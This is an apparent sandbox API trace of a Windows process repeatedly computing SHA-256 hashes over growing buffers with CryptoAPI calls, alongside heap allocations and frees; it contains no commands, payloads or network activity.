	[0102.119] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246bd8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246bd8, pdwDataLen=0x12941c) returned 1
	[0102.119] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.119] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.119] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.119] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.119] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x1000, dwFlags=0x0) returned 1
	[0102.119] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246c00
	[0102.119] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246c00, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246c00, pdwDataLen=0x12941c) returned 1
	[0102.119] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.119] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.119] RtlFreeHeap (HeapHandle=0x1d0000, Flags=0x8, BaseAddress=0x244988) returned 1
	[0102.119] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x1000) returned 0x244988
	[0102.120] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.120] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.120] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x20, dwFlags=0x0) returned 1
	[0102.120] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246c28
	[0102.120] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246c28, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246c28, pdwDataLen=0x12941c) returned 1
	[0102.120] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.120] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.120] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.120] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.120] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x40, dwFlags=0x0) returned 1
	[0102.120] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.120] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246c50
	[0102.120] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246c50, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246c50, pdwDataLen=0x12941c) returned 1
	[0102.120] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.120] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.120] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.121] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.121] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x60, dwFlags=0x0) returned 1
	[0102.121] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246c78
	[0102.121] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246c78, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246c78, pdwDataLen=0x12941c) returned 1
	[0102.121] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.121] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.121] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.121] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.121] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x80, dwFlags=0x0) returned 1
	[0102.121] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.121] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ca0
	[0102.121] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246ca0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ca0, pdwDataLen=0x12941c) returned 1
	[0102.121] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.121] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.121] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.122] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.122] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xa0, dwFlags=0x0) returned 1
	[0102.122] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246cc8
	[0102.122] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246cc8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246cc8, pdwDataLen=0x12941c) returned 1
	[0102.122] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.122] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.122] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.122] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.122] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0xc0, dwFlags=0x0) returned 1
	[0102.122] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.122] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246cf0
	[0102.122] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246cf0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246cf0, pdwDataLen=0x12941c) returned 1
	[0102.122] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.122] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.122] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.123] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.123] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0xe0, dwFlags=0x0) returned 1
	[0102.123] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246d18
	[0102.123] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246d18, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246d18, pdwDataLen=0x12941c) returned 1
	[0102.123] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.123] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.123] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.123] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.123] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x100, dwFlags=0x0) returned 1
	[0102.123] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.123] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246d40
	[0102.123] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246d40, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246d40, pdwDataLen=0x12941c) returned 1
	[0102.123] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.123] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.123] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.124] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.124] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x120, dwFlags=0x0) returned 1
	[0102.124] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246d68
	[0102.124] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246d68, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246d68, pdwDataLen=0x12941c) returned 1
	[0102.124] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.124] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.124] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.124] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.124] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x140, dwFlags=0x0) returned 1
	[0102.124] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.124] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246d90
	[0102.124] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246d90, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246d90, pdwDataLen=0x12941c) returned 1
	[0102.124] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.124] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.124] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.125] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.125] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x160, dwFlags=0x0) returned 1
	[0102.125] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246db8
	[0102.125] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246db8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246db8, pdwDataLen=0x12941c) returned 1
	[0102.125] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.125] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.125] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.125] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.125] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x180, dwFlags=0x0) returned 1
	[0102.125] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.125] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246de0
	[0102.125] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246de0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246de0, pdwDataLen=0x12941c) returned 1
	[0102.125] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.125] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.125] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.126] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.126] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x1a0, dwFlags=0x0) returned 1
	[0102.126] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246e08
	[0102.126] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246e08, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246e08, pdwDataLen=0x12941c) returned 1
	[0102.126] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.126] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.126] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.126] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.126] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x1c0, dwFlags=0x0) returned 1
	[0102.126] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.126] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246e30
	[0102.126] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246e30, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246e30, pdwDataLen=0x12941c) returned 1
	[0102.126] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.126] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.126] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.127] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.127] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x1e0, dwFlags=0x0) returned 1
	[0102.127] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246e58
	[0102.127] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246e58, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246e58, pdwDataLen=0x12941c) returned 1
	[0102.127] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.127] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.127] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.127] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.127] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x200, dwFlags=0x0) returned 1
	[0102.127] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.127] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246e80
	[0102.127] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246e80, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246e80, pdwDataLen=0x12941c) returned 1
	[0102.127] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.127] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.127] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.128] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.128] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x220, dwFlags=0x0) returned 1
	[0102.128] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ea8
	[0102.128] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246ea8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ea8, pdwDataLen=0x12941c) returned 1
	[0102.128] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.128] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.128] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.128] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.128] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x240, dwFlags=0x0) returned 1
	[0102.128] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.128] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ed0
	[0102.128] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246ed0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ed0, pdwDataLen=0x12941c) returned 1
	[0102.128] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.128] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.128] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.129] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.129] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x260, dwFlags=0x0) returned 1
	[0102.129] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246ef8
	[0102.129] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246ef8, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246ef8, pdwDataLen=0x12941c) returned 1
	[0102.129] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.129] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.129] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.129] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.129] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x280, dwFlags=0x0) returned 1
	[0102.129] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.129] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246f20
	[0102.129] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246f20, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246f20, pdwDataLen=0x12941c) returned 1
	[0102.129] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.129] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.129] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.130] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.130] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x2a0, dwFlags=0x0) returned 1
	[0102.130] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246f48
	[0102.130] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246f48, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246f48, pdwDataLen=0x12941c) returned 1
	[0102.130] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.130] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.130] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.130] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.130] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x2c0, dwFlags=0x0) returned 1
	[0102.130] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.130] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246f70
	[0102.130] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246f70, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246f70, pdwDataLen=0x12941c) returned 1
	[0102.130] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.130] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.130] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.131] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.131] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x2e0, dwFlags=0x0) returned 1
	[0102.131] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246f98
	[0102.131] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x2, pbData=0x246f98, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246f98, pdwDataLen=0x12941c) returned 1
	[0102.131] CryptDestroyHash (hHash=0x213ab0) returned 1
	[0102.131] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.131] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.131] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.131] CryptHashData (hHash=0x213a70, pbData=0x244988, dwDataLen=0x300, dwFlags=0x0) returned 1
	[0102.131] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
	[0102.131] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x20) returned 0x246fc0
	[0102.131] CryptGetHashParam (in: hHash=0x213a70, dwParam=0x2, pbData=0x246fc0, pdwDataLen=0x12941c, dwFlags=0x0 | out: pbData=0x246fc0, pdwDataLen=0x12941c) returned 1
	[0102.131] CryptDestroyHash (hHash=0x213a70) returned 1
	[0102.131] CryptReleaseContext (hProv=0x249f18, dwFlags=0x0) returned 1
	[0102.131] CryptAcquireContextW (in: phProv=0x129420, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x129420*=0x249f18) returned 1
	[0102.131] CryptCreateHash (in: hProv=0x249f18, Algid=0x800c, hKey=0x0, dwFlags=0x0, phHash=0x129424 | out: phHash=0x129424) returned 1
	[0102.131] CryptHashData (hHash=0x213ab0, pbData=0x244988, dwDataLen=0x320, dwFlags=0x0) returned 1
	[0102.132] CryptGetHashParam (in: hHash=0x213ab0, dwParam=0x4, pbData=0x12941c, pdwDataLen=0x129418, dwFlags=0x0 | out: pbData=0x12941c, pdwDataLen=0x129418) returned 1
